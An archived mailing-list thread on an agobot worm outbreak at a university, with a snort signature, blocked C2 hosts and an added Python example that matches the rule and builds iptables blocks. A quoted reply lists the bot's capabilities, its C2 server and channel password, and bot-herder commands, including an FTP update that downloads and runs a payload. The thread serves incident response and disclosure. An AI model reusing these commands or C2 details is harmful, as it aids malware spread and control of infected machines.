Open Source and information security mailing list archives
From: ddh at mtu.edu (David Hale)
Subject: Re: Outbreak of a virus on campus

  We have currently blocked connections to/from port 7000 on the
following hosts:

130.74.82.206
131.234.100.43
193.87.20.31

  This seems to have contained the spread of the worm within our campus. 
The list of hosts was gathered with a snort signature of:

alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic";
content:"weednet";classtype:bad-unknown; sid:71727; rev:1;)

  Until the block was in place we had shut down around 50 hosts (mainly on
our dorm network) that had been infected with the worm.

  -Dave Hale
   Sr. Security Specialist
   Michigan Technological University

>
> ----- Original Message -----
> From: "Morning Wood"
> Date: Sat, 24 Apr 2004 18:37:31 +0000
> To: mueller@...net.com, full-disclosure@...ts.netsys.com
> Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
>
>> phatbot?
>
> This one is yet another agobot. It has a long list of useful commands
> (included at the end of the posting, if someone is interested...),
> polymorph capability, stealth capability - hides its own process
> in memory and binary from listing, capable of updating itself
> via ftp/http, has a list of servers for evaluating connection speed,
> steals cdkeys, sniffs a wire, performs ddos, capable of installing
> a proxy, sends spam via aol, can install identd, has a LONG list of
> various processes to kill (mostly AV, but also regedit and tcpview
> among others), retrieves sysinfo, makes screenshots etc etc etc -
> looks similar to other good household bots :)
>
> What makes it interesting - its stealth capability and propagation.
> It has the following scanning/propagation subroutines:
>
> CScannerBagle
> CScannerBase
> CScannerDCOM
> CScannerDoom
> CScannerDW
> CScannerHTTP
> CScannerNetBios
> CScannerOptix
> CScannerSQL
> CScannerUPNP
> CScannerWKS
>
>
> When the worm is started, it connects to irc server
> 193.87.20.31 (irc.weednet.net) port 7000.
> Then it joins the password protected channel
> #1337, password is heyho. As the channel topic is
> .scan.startall, it accepts the command and starts
> scanning right away.
>
> I took my trusty irc client and joined that
> channel myself. Right away the admin gave me these
> commands:
>
> <admin> .login stebo jamesbond007 -s
> <admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe
> %TEMP%\xgf.exeBLAOR12
> <admin> .scan.stop
> <admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe
> c:\xgf.exe BLAOR12
>
> seems like my 'bot' version was too old :)
>
> have fun :)
>
> W.
>
>
> -----------------------
> commands and parameters
> all commands start with . (dot)
>
>
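The post describes two defensive steps: collecting the remote IRC hosts with the snort signature above, then blocking port 7000 to and from those hosts. The following is an added example, not code from the original post or from either poster, that re-implements the logic of that signature as a small offline matcher over constructed packet records and derives the block list from the hits. It assumes $HOME_NET is a single made-up 10.0.0.0/8 range, the sample traffic and addresses are constructed, and the iptables commands are one illustrative way of expressing the port block, not what the campus actually ran.

```python
# Added example (not code from the original post): offline re-implementation of
#   alert tcp $HOME_NET any -> any 7000 (content:"weednet"; ...)
# over constructed packet records, plus the resulting port-7000 block list.
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Assumption: $HOME_NET is modelled as one constructed RFC 1918 range.
HOME_NET = (ip_network("10.0.0.0/8"),)

# Port and content pattern taken from the rule in the post.
RULE_DPORT = 7000
RULE_CONTENT = b"weednet"


@dataclass(frozen=True)
class Packet:
    proto: str      # "tcp" or "udp"
    src: str        # source IPv4 address
    sport: int
    dst: str        # destination IPv4 address
    dport: int
    payload: bytes


def in_home_net(addr: str) -> bool:
    ip = ip_address(addr)
    return any(ip in net for net in HOME_NET)


def matches_rule(pkt: Packet) -> bool:
    """Mirror the rule header ($HOME_NET any -> any 7000, tcp) and its content option."""
    return (
        pkt.proto == "tcp"
        and in_home_net(pkt.src)
        and pkt.dport == RULE_DPORT
        and RULE_CONTENT in pkt.payload
    )


def triage(packets):
    """Group alerts by the remote host each internal machine talked to.

    Returns {remote_host: [internal_host, ...]}: the keys are the candidates for
    the port block, the values the internal machines that need cleaning.
    """
    hits = defaultdict(set)
    for pkt in packets:
        if matches_rule(pkt):
            hits[pkt.dst].add(pkt.src)
    return {dst: sorted(srcs) for dst, srcs in hits.items()}


def block_rules(remote_hosts, dport=RULE_DPORT):
    """Emit iptables commands dropping traffic to and from the port on each host
    (an illustrative equivalent of the port 7000 block described in the post)."""
    lines = []
    for host in sorted(remote_hosts):
        lines.append(f"iptables -A FORWARD -p tcp -d {host} --dport {dport} -j DROP")
        lines.append(f"iptables -A FORWARD -p tcp -s {host} --sport {dport} -j DROP")
    return lines


# Constructed sample traffic; addresses and payloads are made up for this example.
SAMPLE = [
    Packet("tcp", "10.20.1.15", 3341, "192.0.2.10", 7000, b"USER xgf 0 0 :weednet\r\n"),
    Packet("tcp", "10.20.1.15", 3341, "192.0.2.10", 7000, b"JOIN #1337 heyho\r\n"),
    Packet("tcp", "10.20.7.88", 1199, "192.0.2.10", 7000, b"NICK weednet-0419\r\n"),
    Packet("tcp", "10.20.7.88", 1200, "198.51.100.5", 7000, b"PASS weednet\r\n"),
    Packet("tcp", "10.20.3.2", 4455, "203.0.113.9", 7000, b"GET / HTTP/1.0\r\n"),   # port 7000, no marker
    Packet("udp", "10.20.3.2", 4456, "192.0.2.10", 7000, b"weednet"),                 # wrong protocol
    Packet("tcp", "192.0.2.10", 7000, "10.20.1.15", 3341, b":irc.weednet.net 001"),  # server reply: src is not $HOME_NET
]

if __name__ == "__main__":
    hits = triage(SAMPLE)
    for remote, internal in hits.items():
        print(f"{remote}: infected internal hosts {internal}")
    print("\n".join(block_rules(hits)))
```

One property of the rule worth seeing in the sample: its header only covers the client-to-server direction (source in $HOME_NET, destination port 7000), so the last sample packet, a server reply that carries the same string but arrives from port 7000, does not fire; a matcher that should also catch the server side needs a second rule or a bidirectional header.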